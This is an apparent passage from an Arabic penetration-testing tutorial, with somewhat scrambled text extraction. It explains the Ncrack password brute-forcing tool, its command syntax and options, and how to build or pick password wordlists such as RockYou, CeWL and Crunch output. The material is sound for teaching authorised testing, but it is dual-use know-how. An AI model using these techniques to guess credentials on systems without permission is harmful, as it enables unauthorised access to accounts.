ﻋﻧد اﻟﻔﺣص ﺑﺄداة Nmapﯾﻣﻛن ان ﯾﻛﺷف ﻟﻧﺎ ان اﻟﻧظﺎم اﻟﻣﺳﺗﺧدم ھو وﯾﻧدوز ﻣﻊ وﺟود ﺧدﻣﺔ sshﻣﻔﺗوﺣﺔ ،ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﺳﺗﻌﯾن اﻟﮭﺎﻛر
أو ﻣﺧﺗﺑر اﻹﺧﺗراق ﺑﺄدوات اﻟﺗﺧﻣﯾن ﺣول ﻛﻠﻣﺎت اﻟﺳر ﻟﮭذه اﻟﺧدﻣﺎت )اﻟﺑروﺗوﻛوﻻت(.
ﻗد ﺗم ﺗﺻﻣﯾم Ncrackﺑﺎﺳﺗﺧدام ﻧﮭﺞ اﻟوﺣدات) ، (modular approachﺑﻧﺎء ﺟﻣﻠﺔ ﺳطر اﻷواﻣر ﻣﺷﺎﺑﮭﺔ ل nmapوﻣﺣرك Ncrack
)(dynamic engineاﻟﺗﻲ ﯾﻣﻛن أن ﺗﺗﻛﯾف ﻣﻊ ﺣﺎﻻت اﻟﺷﺑﻛﺔ اﻟﻣﺧﺗﻠﻔﺔ وﺗﻛون ﻗﺎﺋﻣﮫ ﻋﻠﻰ أﺳﺎس اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﺷﺑﻛﺔ اﻟﮭدف .ﯾﻣﻛن
اﺳﺗﺧداﻣﮭﺎ ﻋﻠﻰ ﻧطﺎق واﺳﻊ ﻣن اﻟﻣﺿﯾﻔﯾن اﻟﻣﺗﻌددة.
ﯾﺗﻣﯾز Ncrackﺑواﺟﮭﺔ ﻣرﻧﺔ ﻟﻠﻐﺎﯾﺔ ﻟﻣﻧﺢ اﻟﺗﺣﻛم اﻟﻛﺎﻣل ﻟﻠﻣﺳﺗﺧدم ﻓﻲ ﻋﻣﻠﯾﺎت اﻟﺷﺑﻛﺔ ،اﻟﺳﻣﺎح ل ھﺟﻣﺎت brute forcingاﻟﻣﺗطورة
واﻟﻣﻛﺛﻔﺔ ﻟﻠﻐﺎﯾﺔ ،ﯾوﺟد ﻗواﻟب اﻟﺗوﻗﯾت ) (timing templatesﻟﺳﮭوﻟﺔ اﻻﺳﺗﺧدام ،اﻟﺗﻔﺎﻋل وﻗت اﻟﺗﺷﻐﯾل ﻣﺛل Nmapوﻏﯾرھﺎ ﻣن اﻟﻛﺛﯾر ﻣن
اﻟﻣﻣﯾزات .ﺗﺷﻣل اﻟﻌدﯾد ﻣن اﻟﺑروﺗوﻛوﻻت ﻛﺎﻻﺗﻰ:
RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet
ﻋﻠﻰ اﻟرﻏم ﻣن أن اﻟﻣﻌﺎﻣﻼت اﻻﻓﺗراﺿﯾﺔ ) (default parameterھﻲ ﻋﺎﻣﺔ ﻛﺎﻓﯾﺔ ﻟﺗﻐطﯾﺔ ﻛل اﻟﺣﺎﻻت ﺗﻘرﯾﺑﺎ .ﻟﻛﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ وﺣدات
اﻟﮭﻧدﺳﺔ اﻟﻣﻌﻣﺎرﯾﺔ ) (modular architectureاﻟﺗﻲ ﺗﺳﻣﺢ ﺑﺗﻣدﯾد اﻟدﻋم ﻟﺑروﺗوﻛوﻻت إﺿﺎﻓﯾﺔ ﻏﯾر اﻟﻣدرﺟﺔ ﺑﺳﮭوﻟﮫ.
ﯾﻣﻛن اﻟﺣﺻول ﻋﻠﻰ ھذه اﻷداة واﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ ﺟﻣﯾﻊ أﻧظﻣﺔ اﻟﺗﺷﻐﯾل ﺑﻣﺎ ﻓﻲ ذﻟك اﻟوﯾﻧدوز وذﻟك ﻣن ﺧﻼل زﯾﺎرة اﻟراﺑط اﻟﺗﺎﻟﻲ:
http://nmap.org/ncrack/
ھذه اﻷداة ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ وﯾﻣﻛن اﻟوﺻول اﻟﯾﮭﺎ ﺑﺎﺗﺑﺎع اﻻﺗﻲ:
Applications | Kali Linux | Password Attacks | Online Attacks | Ncrack.
اﻟﺻﯾﻐﺔ اﻟﻌﺎﻣﺔ ﻻﺳﺗﺧدام ھذه اﻷداة ﻛﺎﻻﺗﻰ:
}>#ncrack [<Options>] {<target specification
ﻣﺛﺎل ﻻﺳﺗﺧدام ھذا اﻻﻣر ﻛﺎﻻﺗﻰ:
ﻣﻠﺣوظﮫ :ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻻﻣر ncrackﺑدون أي ﻣن اﻟﻣﻌﺎﻣﻼت ﻓﺳوف ﯾﻘوم ﺑﻌرض ﺟﻣﯾﻊ اﻟﻣﻌﺎﻣﻼت اﻟﻣﺳﺗﺧدﻣﺔ ﻣﻌﮫ أﺷﮭر ھذه
اﻟﻣﻌﺎﻣﻼت ﻛﺎﻻﺗﻰ:
) :(-Uﻣﻠف اﻟﻣﺳﺗﺧدﻣﯾن.
) :(-Pﻣﻠف ﻛﻠﻣﺎت اﻟﺳر.
) :(--userاﺳم اﻟﻣﺳﺗﺧدم اﻟدى ﺗم ﺗﺧﻣﯾﻧﮫ ﺑﻧﺟﺎح.
) :(--passﻛﻠﻣﺔ اﻟﺳر اﻟﺗﻲ ﺗم ﺗﺧﻣﯾﻧﮭﺎ ﺑﻧﺟﺎح.
) :(--password-firstﻛرر اﻟﺗﺧﻣﯾن ﻟﻛل ﻣﺳﺗﺧدم ﻣن ﺧﻼل ﻣﻠف ﻛﻠﻣﺎت اﻟﺳر.
) :(-Vﻟﻠﺗﻌرف ﻋﻠﻰ اﺻدار اﻟﺗطﺑﯾﻖ.
) :(-fاﻟﺗوﻗف اذا ﺗم إﯾﺟﺎد ﻛﻠﻣﺔ اﻟﻣرور واﺳم اﻟﻣﺳﺗﺧدم اﻟﺻﺣﯾﺣﺔ.
) :(-6ﻟﺗﻔﻌﯾﺎ ﻓﺣص اﻟﻌﻧﺎوﯾن ﻣن اﻟﻧوع .IPv6
Target Specification
ﯾﺗم اﻟﺗﻌﺎﻣل ﻣﻊ ﻛل ﺷﻲء ﻓﻲ ﺳطر أواﻣر Ncrackاﻟﺗﻲ ھﻲ ﻟﯾﺳت ﺧﯾﺎرا ) (optionsﻋﻠﻰ اﻧﮫ اﻟﻣﺿﯾف اﻟﮭدف .أﺑﺳط ﺷﻲء ھو ﺗﺣدﯾد
ﻋﻧوان IPﻟﻠﮭدف أو اﺳم ﻣﺿﯾف .ﺗﺣﺗﺎج أﯾﺿﺎ إﻟﻰ ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻟﻠﮭﺟوم ﻋﻠﻰ اﻷھداف اﻟﻣﺧﺗﺎرة Ncrack .ﻣرن ﺟدا ﻓﻲ ﺗﻌرﯾﻔﮫ ﻟﻠﻣﺿﯾف
/اﻟﺧدﻣﺔ ﻣﺛل اﻟﺗﻲ ﺗﺳﺗﺧدم ﻣﻊ .Nmap
Ncrackﯾدﻋم ﺗﻌرﯾف اﻛﺛر ﻣن ﻣﺿﯾف ) (multi hostsوﻻ ﯾﺷﺗرط ان ﯾﻛون ﻣن ﻧﻔس اﻟﻧوع وﯾدﻋم أﯾﺿﺎ ﻧطﺎق اﻟﺷﺑﻛﺎت و ﯾدﻋم أﯾﺿﺎ
CIDR-style addressingواﻟﺗﻲ ﺳوف ﻧراه ﻓﻲ اﻟﻣﺛﺎل اﻟﺗﺎﻟﻲ.
#ncrack scanme.nmap.org 192.168.0.0/8 10.0.0,1,3-7.- -p22
وﻟﻛن ﯾوﺟد ﺑﻌض اﻟﻣﻌﺎﻣﻼت اﻟﺗﻲ ﯾﻣﻛن اﻟﺗﺣﻛم ﻓﻲ ﺗﻌرﯾف Ncrackﻟﻠﻣﺿﯾﻔﯾن ﻛﺎﻻﺗﻰ:
)-iX <inputfilename> (Input from Nmap's -oX XML output format
ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف واﻟﺗﻲ ﺗﻛون ﻧﺎﺗﺞ اﻻﻣر Nmapﻓﻲ ﺻورة .xml
)-iN <inputfilename> (Input from Nmap's -oN Normal output format
ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف واﻟﺗﻲ ﺗﻛون ﻧﺎﺗﺞ اﻻﻣر Nmapﻓﻲ ﺻورﺗﮫ اﻟﻌﺎدﯾﺔ.
)-iL <inputfilename> (Input from list
ﺣﯾث ﯾﺳﺗﺧدم ھذا اﻟﺗﻌرﯾف ﻟﻘراءة ﻗﺎﺋﻣﮫ ﻣن أﺳﻣﺎء اﻟﻣﺿﯾف اﻟﻣوﺟودة ﻓﻲ اﻟﻣﻠف اﻟﻣﺣدد.
)--exclude <host1>[, <host2>[, ...]] (Exclude hosts/networks
ﯾﺳﺗﺧدم ھذا اﻟﺗﻌﺑﯾر ﻟﻣﻧﻊ ﻗﺎﺋﻣﮫ ﻣن اﻟﻣﺿﯾﻔﯾن.
)--excludefile <exclude_file> (Exclude list from file
ﯾﺳﺗﺧدم ھذا اﻟﺗﻌﺑﯾر ﻟﻣﻧﻊ ﻗﺎﺋﻣﮫ ﻣن اﻟﻣﺿﯾﻔﯾن واﻟﺗﻲ ﺗﻛون ﻣﺗوﻓرة ﻓﻲ ﻣﻠف.
Service Specification
ﯾﻣﻛن إﺟراء أي ﺟﻠﺳﺔ اﺧﺗراق ﻣﻊ اﻟﮭدف ﻣن دون ﺗﻛﺳﯾر ﺧدﻣﺔ ﻣﻌﯾﻧﺔ ﻟﻣﮭﺎﺟﻣﺗﮫ .ﺗﻌرﯾف اﻟﺧدﻣﺔ ھﻲ واﺣدة ﻣن اﻟﻧظم اﻟﻔرﻋﯾﺔ اﻷﻛﺛر ﻣروﻧﺔ
ﻣن Ncrackﺣﯾث ﯾﺗﻌﺎون ﻣﻊ ﺗﻌرﯾف اﻟﻣﺳﺗﮭدﻓﺔ ﺑطرﯾﻘﺔ ﺗﺳﻣﺢ ﻟﺗرﻛﯾب ﺧﯾﺎرات ﻣﺧﺗﻠﻔﺔ ﻟﯾﺗم ﺗطﺑﯾﻘﮭﺎ .ﻟﺑدء ﺗﺷﻐﯾل ،Ncrackﻓﺈﻧك ﺳوف
ﺗﺣﺗﺎج ﻋﻠﻰ اﻻﻗل ﺗﺣدﯾد ﻣﺿﯾف واﺣد ورﺑطﮫ ﺑﺧدﻣﺔ واﺣدة ﻟﻠﮭﺟوم .ﯾوﻓر Ncrackطرق ﻟﺗﺣدﯾد اﻟﺧدﻣﺔ ﻋن طرﯾﻖ رﻗم اﻟﻣﻧﻔذ اﻻﻓﺗراﺿﻲ
اﻟﺧﺎص ﺑﮫ ،او ﻣن ﺧﻼل اﺳﻣﮭﺎ )ﻛﻣﺎ ھﻲ ﻣﺳﺗﺧرﺟﺔ ﻓﻲ اﻟﻣﻠف (ncrack-servicesأو ﻛﻠﯾﮭﻣﺎ .ﻋﺎدة ،ﺗﺣﺗﺎج إﻟﻰ ﺗﻌرﯾف ﻛل ﻣن اﺳم ورﻗم
اﻟﻣﻧﻔذ ﺣﺎﻟﺔ ﺧﺎﺻﺔ ﺣﯾث ﺗﻌﻠﻣون أن ﯾﻣﻛن ﺟﻌل ﺧدﻣﺔ ﻣﻌﯾﻧﺔ ﺗﺳﺗﺧدم ﻣﻧﻔذ ﻏﯾر اﻟﻣﻧﻔذ اﻻﻓﺗراﺿﻲ ﻟﮭﺎ.
ﯾﻘدم Ncrackطرﯾﻘﺗﺎن ﻣﺗﻣﯾزﺗﺎ واﻟﺗﻲ ﺳﯾﺗم ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﺧدﻣﺎت اﻟﮭدف وھﻣﺎ:
per-host service specification -1
global specification -2
Per-host service specification
ﯾﺗم ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻓﻲ ھذا اﻟوﺿﻊ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻟﺧدﻣﺔ ﺑﺟﺎﻧب اﻟﻣﺿﯾف اﻟﮭدف ﺣﯾث ﺗﻛون ﻣﺣدده ﻟﮭذا اﻟﻣﺿﯾف وﺗﻧطﺑﻖ ﻋﻠﯾﮫ ﻓﻘط .وﻟﻛن
ﯾﺟب ان ﻧﺄﺧذ ﻓﻲ اﻻﻋﺗﺑﺎر ،أﻧﮫ ﻋﻧد ﺗﺣدﯾد اﻟﮭدف ﻓﺎﻧﮫ ﯾﺳﻣﺢ ﺑﺎﺳﺗﺧدام ) wildcardsاﻟرﻣوز( و netmaskوھذا ﯾﻌﻧﻲ أﻧﮫ ﻋﻧد ﺗطﺑﯾﻖ ﺻﯾﻐﺔ
ﺗﺣدﯾد اﻟﺧدﻣﺔ ﻟﻛل ﻣﺿﯾف ﻋﻠﻰ ھذا ﻓﺎﻧﮫ ﺳوف ﯾﺷﻣل اﻟﺟﻣﯾﻊ .اﻟﺷﻛل اﻟﻌﺎم ﻛﺎﻻﺗﻰ:
>]<[service-name]>://<target>:<[port-number
ﻣﺛﺎل ﻋﻠﻰ ذﻟك ﻛﺎﻻﺗﻰ:
ﺑﺻرف اﻟﻧظر ﻋن ﺗﺣدﯾد اﻟﺧدﻣﺎت اﻟﻌﺎﻣﺔ Ncrack ،ﯾﺳﻣﺢ ﻟك ﺑﺗوﻓﯾر اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات اﻟﺗﻲ ﯾﻣﻛن ﺗطﺑﯾﻘﮭﺎ ﻋﻠﻰ اﻟﻛل أو ﻣﺟﻣوﻋﺔ ﻓرﻋﯾﺔ
ﻣن اﻷھداف اﻟﺧﺎﺻﺔ ﺑك .ﺗﺷﻣل اﻟﺧﯾﺎرات اﻟﺗوﻗﯾت واﻷداء SSL ،ﺗﻣﻛﯾن /ﺗﻌطﯾل ،وﻏﯾرھﺎ ﻣن ﻣﻌﺎﻣﻼت اﻟوﺣدة اﻟﻣﺣددة
) (module-specific parametersﻣﺛل ﻣﺳﺎر URLاﻟﻧﺳﺑﻲ ﻟﻠوﺣدة .HTTPﯾﻣﻛن ﺗﻌرﯾف اﻟﺧﯾﺎرات ﻓﻲ ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻟطرق
اﻟﺗﻲ ﺗﺷﻣل:
Per-host options, per-module options and global options
Output
ﺣﯾث ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن ﺗﺣدﯾد ﻛﯾﻔﯾﺔ اﺧراج وﺗﺧزﯾن ﻧﺎﺗﺞ اﻻﻣر Ncrackوﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض اﻟﺻﯾﻎ اﻟﻌﺎﻣﺔ واﻟﺗﻲ ﺗوﺿﺢ طرﯾﻘﺔ ﺣﻔظ ﻧﺎﺗﺞ اﻻﻣر.
)-oN <filespec> (normal output
)-oX <filespec> (XML output
)-oA <basename> (Output to all formats
ﯾﻣﻛن اﻻطﻼع ﻋﻠﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﻌﻠوﻣﺎت ﻋن ھذه اﻷداة ﻣن ﺧﻼل زﯾﺎرة اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ:
http://nmap.org/ncrack/man.html
ﯾﻣﻛن أﯾﺿﺎ اﻻطﻼع ﻋﻠﻰ اﻟﻛﺛﯾر ﻣن اﻟﻣﻌﻠوﻣﺎت ﺣول ﻛﯾﻔﯾﺔ اﻧﺷﺎء/إﺿﺎﻓﺔ ﺑروﺗوﻛوﻻت ووﺣدات ﻏﯾر اﻟﻣدرﺟﺔ ﻓﻲ ھذه اﻷداة ﻣن ﺧﻼل زﯾﺎرة
اﻟﻣوﻗﻊ اﻟﺗﺎﻟﻲ )ھذا ﺧﺎص ﺑﺎﻟﻣطورﯾن(:
http://nmap.org/ncrack/devguide.html
واﺣدة ﻣن اﻟﻣﺗطﻠﺑﺎت اﻟﻣذﻛورة أﻋﻼه ھﻲ ﻗﺎﺋﻣﺔ اﻟﻘﺎﻣوس) (Dictionary listواﻟﺗﻲ ﯾطﻠﻖ ﻋﻠﯾﮭﺎ ﻋدة أﺳﻣﺎء أﺧرى ﻣﺛل World Listاو
،Password Profilingوﻟﻛن ﻓﻲ اﻟﻧﮭﺎﯾﺔ ﺗﺷﯾر ﺟﻣﯾﻌﮭﺎ اﻟﻰ ﻣﻌﻧﻰ واﺣد وھو ﻋﻣﻠﯾﺔ ﺑﻧﺎء ﻗﺎﺋﻣﺔ ﻟﻛﻠﻣﺎت اﻟﻣرور اﻟﻣﺧﺻﺻﺔ اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ
ﻟﺗﺧﻣﯾن ﻛﻠﻣﺎت اﻟﺳر ﻟﻛﯾﺎن ﻣﺣدد او ﺑﻣﻌﻧﻰ اﺧر ھو اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻣن ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺣﺗﻣﻠﺔ .وﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺷﺎر إﻟﯾﮭﺎ ﺑﺎﺳم ھذه
اﻟﻘواﺋم اﻟﻘواﻣﯾس ﻷﻧﮭﺎ ﺗﺣﺗوي ﻋﻠﻰ اﻵﻻف أو ﺣﺗﻰ اﻟﻣﻼﯾﯾن ﻣن اﻟﻛﻠﻣﺎت اﻟﻔردﯾﺔ.
ﻣﻌظم اﻟﻧﺎس ﻏﺎﻟﺑﺎ ﻣﺎ ﺗﺳﺗﺧدم اﻟﻛﻠﻣﺎت اﻻﻧﺟﻠﯾزﯾﺔ اﻟﻌﺎدﯾﺔ أو ﻣﻊ ﺑﻌض اﻻﺧﺗﻼف اﻟﺻﻐﯾرة ﻣﺛل 1ﻋﻠﻰ اﻧﮫ ﺣرف iأو 5ﻋﻠﻰ اﻧﮫ ﺣرف sاو ﻗد
ﯾﺳﺗﺧدﻣوا ﺑﻌض اﻟﻛﻠﻣﺎت اﻟﻣﻌﺑرة ﻋن ﺣﯾﺎﺗﮭم اﻟﺷﺧﺻﯾﺔ ﻋﻧدﻣﺎ ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء ﻛﻠﻣﺎت اﻟﻣرور .ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،إذا ﻛﺎن Bobﯾﺣب ﻛﻠﺑﮫ
Barfyأﻛﺛر ﻣن أي ﺷﻲء ﻓﻲ اﻟﻌﺎﻟم ،وﻧﺗﯾﺟﺔ ﻟذﻟك ﻓﺄﻧﻰ ﻣﺗﺄﻛد ان ﻛﻠﻣﺔ اﻟﻣرور ﺳوف ﺗﻛون اﻣﺎ Barfyاو dogاو ﻏﯾرھﺎ ﻣن اﻟﻛﻠﻣﺎت ذات
اﻟﺻﻠﺔ ﺑﺎﻟﻛﻼب ذات اﻟﺻﻠﺔ واﻟﺗﻲ ﺳوف ﺗﻛون ﻣوﺟودة ﻓﻲ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺔ اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﻲ .ﻗواﺋم ﻛﻠﻣﺔ اﻟﺳر ھﻲ ﻣﺣﺎوﻟﺔ ﻟﺟﻣﻊ أﻛﺑر ﻋدد
ﻣﻣﻛن ﻣن ھذه اﻟﻛﻠﻣﺎت اﻟﻣﻣﻛﻧﺔ .ﺑﻌض اﻟﻣﺗﺳﻠﻠﯾن وﻣﺧﺗﺑري اﻻﺧﺗراق ﯾﻘﺿون ﺳﻧوات ﻟﺑﻧﺎء ﻗواﻣﯾس ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ ﻗد ﺗﺻل ﺣﺟﻣﮭﺎ إﻟﻰ
ﺟﯾﺟﺎ ﺑﺎﯾت وﯾﺣﺗوي ﻋﻠﻰ اﻟﻣﻼﯾﯾن أو ﺣﺗﻰ اﻟﻣﻠﯾﺎرات ﻣن ﻛﻠﻣﺎت اﻟﺳر .اﻟﻘﺎﻣوس اﻟﺟﯾد ﯾﻣﻛن أن ﯾﻛون ﻣﻔﯾد ﻟﻠﻐﺎﯾﺔ وﻟﻛن ﻏﺎﻟﺑﺎ ﻣﺎ ﯾﺗطﻠب اﻟﻛﺛﯾر
ﻣن اﻟوﻗت واﻻھﺗﻣﺎم ﻟﻠﺣﻔﺎظ ﻋﻠﻰ ﻧظﺎﻓﺔ .اﻟﻘواﻣﯾس ﻧظﯾﻔﺔ وﻣﺑﺳطﺔ وﺧﺎﻟﯾﺔ ﻣن اﻻزدواﺟﯾﺔ.
ﻣﻌظم ﺑراﻣﺞ ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور ﯾﻣﻛﻧﮭم اﺳﺗﺧدام ﻣﻠف ﻛﻠﻣﺔ اﻟﻣرور ﻣﺑﺎﺷرة ﻷﻧﮭﺎ ﻣوﺟودة ،ﻓﻲ ﺣﯾن أن أﻛﺛر اﻟدول اﻟﻣﺗﻘدﻣﺔ ﯾﻣﻛن اﺳﺗﺧدام
ﻣﻠف ﻛﻠﻣﺔ اﻟﺳر )أو ﻣﻠﻔﺎت ﻣﺗﻌددة( واﻟﺗﻼﻋب ﺑﮭﺎ ﻟﻣﺣﺎوﻟﺔ ﺧﻠﻖ اﻟﻌدﯾد ﻣن اﻟﺗرﻛﯾﺑﺎت اﻟﺟدﯾدة ﻣن ﻛﻠﻣﺎت اﻟﺳر.
ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ،ﯾﻣﻛن ﻟﺑﻌض اﻟﺗطﺑﯾﻘﺎت اﺗﺧﺎذ ﺟﻣﯾﻊ ﻛﻠﻣﺎت اﻟﺳر اﻟﻣوﺟود ﻓﻲ ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت وإرﻓﺎق ﺑﻌض اﻷﺣرف أو اﻷرﻗﺎم إﻟﻰ ﺑداﯾﺔ أو
ﻧﮭﺎﯾﺔ اﻟﻛﻠﻣﺔ .وﺑﻌض اﻟﺑراﻣﺞ اﻷﺧرى ﺗﺗﻌﺎﻣل ﻣﻊ اﺛﻧﯾن أو أﻛﺛر ﻣن اﻟﻣﻠﻔﺎت ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ﻓﻲ أﻧن واﺣد واﻟﺟﻣﻊ ﺑﯾن اﻟﻛﻠﻣﺎت ﻟﻣﺣﺎوﻟﺔ ﺗﻘدﯾم
ﻗﺎﺋﻣﺔ ﺟدﯾدة ﻣن اﻟﻛﻠﻣﺎت.
اﺳﺗﺧدام ﻗﺎﺋﻣﺔ اﻟﻛﻠﻣﺎت ﯾﺟﻌل ﻣن ﻋﻣﻠﯾﺔ ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور ﻋﻣﻠﯾﮫ ﺳﮭﻠﮫ وﺳرﯾﻌﺔ .ﻓﺈن اﻟﻌدﯾد ﻣن ﻣﺧﺗﺑري اﻻﺧﺗراق ﯾﻘوﻣوا ﺑﺈﻧﺷﺎء اﻟﻌدﯾد
ﻣن ﻗواﺋم ﻛﻠﻣﺎت اﻟﻣرور اﻟﺧﺎﺻﺔ ﺑﮭم ﺑﺎﺳﺗﺧدام ﺑﯾﺎﻧﺎت اﻟﺷرﻛﺔ ،وأﺳﻣﺎء اﻟﻣوظﻔﯾن وأرﻗﺎم اﻟﮭﺎﺗف وﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،إﻟﺦ.
ھﻧﺎك اﻟﻛﺛﯾر ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت اﻟﺻﻐﯾرة اﻟﺗﻲ ﯾﻣﻛن ﺗﺣﻣﯾﻠﮭﺎ ﻣن ﻋﻠﻰ اﻹﻧﺗرﻧت وﺗﻛون ﺑﻣﺛﺎﺑﺔ ﻧﻘطﺔ اﻧطﻼق ﺟﯾدة ﻟﺑﻧﺎء ﻗﺎﻣوس ﻛﻠﻣﺔ اﻟﺳر
اﻟﺷﺧﺻﯾﺔ اﻟﺧﺎﺻﺔ ﺑك .وھﻧﺎك أﯾﺿﺎ اﻷدوات اﻟﻣﺗﺎﺣﺔ اﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ ﺑﻧﺎء ﻗواﺋم اﻟﻘواﻣﯾس ﺑﺎﻟﻧﺳﺑﺔ ﻟك .وﻟﻛن ،ﻟﺣﺳن اﻟﺣظ ،ﻓﺎن ﻧظﺎم اﻟﺗﺷﻐﯾل
ﻛﺎﻟﻲ ﺑﺎﻟﻔﻌل ﯾﺣﺗوي ﻋﻠﻰ ﻋدد ﻗﻠﯾل ﻣن ﻗواﺋم اﻟﻛﻠﻣﺎت ﺑﺎﻟﻧﺳﺑﺔ ﻟﻧﺎ ﻻﺳﺗﺧداﻣﮭﺎ .ﯾﻣﻛﻧك اﻟﻌﺛور ﻋﻠﻰ ھذه ﻓﻲ اﻟﻣﺳﺎر ][/usr/share/wordlists
اﻟذي ﯾﺣﺗوي ﻋﻠﻰ واﺣد ﻣن أﻋﺗﻰ ﻗواﺋم اﻟﻛﻠﻣﺎت واﻟذي ﯾﺳﻣﻰ ") "RockYouﻣﺄﺧوذ ﻣن ﺧرق اﻟﺑﯾﺎﻧﺎت اﻟﻛﺑﯾرة ﻟﻠﻐﺎﯾﺔ(.
ھﻧﺎك أﯾﺿﺎ ﻗﺎﺋﻣﺔ ﻛﻠﻣﺎت ﺻﻐﯾرة وﻟﻛﻧﮭﺎ ﻣﻔﯾدة ﺟدا ﻣﺗﺿﻣﻧﮫ ﻣﻊ ) (JtRواﻟﺗﻲ ﺗﻘﻊ ﻓﻲ اﻟﻣﺳﺎر ].[/usr/share/john/password.lst
ھﻧﺎك ﻗواﺋم أﺧرى واﻟﺗﻲ ﺗﺳﻣﻰ WFUZZ Multiple Wordlistsواﻟﺗﻲ ﺗوﺟد ﻓﻲ اﻟﻣﺳﺎر ./usr/share/wfuzz/
ﻋﻧدﻣﺎ ﯾﺗﻌﻠﻖ اﻷﻣر ﺑﻘواﺋم ﻛﻠﻣﺎت اﻟﻣرور ،ﻓﺎن اﻷﻛﺑر ﻣﻧﮭﺎ ﻟﯾس داﺋﻣﺎ اﻷﻓﺿل .أدوات ﻛﺳر ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ اﻟوﺿﻊ Offlineﻣﺛل JtR
ﺗﻌﺎﻟﺞ اﻟﻣﻼﯾﯾن ﻣن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة .ﻓﻲ ھذه اﻟﺣﺎﻻت ،ﻓﺎن ﻛﻠﻣﺎ ﻛﺎﻧت ﻗواﺋم ﻛﻠﻣﺎت اﻟﺳر أﻛﺑر ﻛﻠﻣﺎ ﻛﺎن ﺟﯾدا .وﻣﻊ ذﻟك ،ﻓﺎن
ﺗﻘﻧﯾﺎت ﺗﻛﺳﯾر ﻛﻠﻣﺎت اﻟﻣرور أﺧرى ﻣﺛل اﻟﻣﯾدوﺳﺎ واﻟﮭﯾدرا ﻗد ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﻣﻌﺎﻟﺟﺔ واﺣد أو اﺛﻧﯾن ﻣن ﻛﻠﻣﺎت اﻟﺳر ﻓﻲ اﻟﺛﺎﻧﯾﺔ اﻟواﺣدة ﻓﻘط.
ﻓﻲ ھذه اﻟﺣﺎﻻت ،ﻓﺎن وﺟود ﻗﺎﺋﻣﺔ واﺣدة ﻣﻊ اﻟﻣﻠﯾﺎرات ﻣن ﻛﻠﻣﺎت اﻟﻣرور ﻏﯾر ﻋﻣﻠﻲ ﻷﻧك ﺑﺑﺳﺎطﺔ ﻟن ﯾﻛون ﻟدﯾك اﻟوﻗت ﻟﻠﺣﺻول ﻋﻠﻰ
ﻛﻠﻣﺎت اﻟﻣرور ﻣن ﺧﻼل اﻟﻘﺎﺋﻣﺔ ﺑﺄﻛﻣﻠﮭﺎ .ﻓﻲ ﻣﺛل ھذه اﻟﺣﺎﻻت ،ﻓﺎﻧﮫ ﻣن اﻷﻓﺿل اﺳﺗﺧدام ﻗﺎﻣوس أﺻﻐر ،واﻟذي ﯾﺣﺗوي ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﻣرور
اﻷﻛﺛر ﺷﻌﺑﯾﺔ.
ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾﺗوﻓر اﻟﻌدﯾد ﻣن اﻷدوات واﻟﺗﻲ ﺗﻣﻛﻧك ﻣن إﻧﺷﺎء wordlistsﺷﺧﺻﯾﺔ ﺧﺎﺻﺔ ﺑك .ﻣن ھذه اﻻدوات CeWLھو
أﻧﯾﻖ ﺟدا ﻷﻧﮫ ﯾﺗﯾﺢ ﻟك إﻧﺷﺎء ﻛﻠﻣﺎت اﻟﻣرور ﻋن طرﯾﻖ اﻻﺳﺗﯾﻼء ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﻣن ﻣوﻗﻊ اﻟﮭدف Crunch .ھو اداه ﻟطﯾﻔﮫ ﺟدا ﺗﺳﻣﺢ ﻟك
ﻟﺧﻠﻖ wordlistsاﻟﻣﺧﺻﺻﺔ اﻟﺧﺎﺻﺔ ﺑك ﻣن اﻟﺻﻔر.
http://www.digininja.org/projects/cewl.php
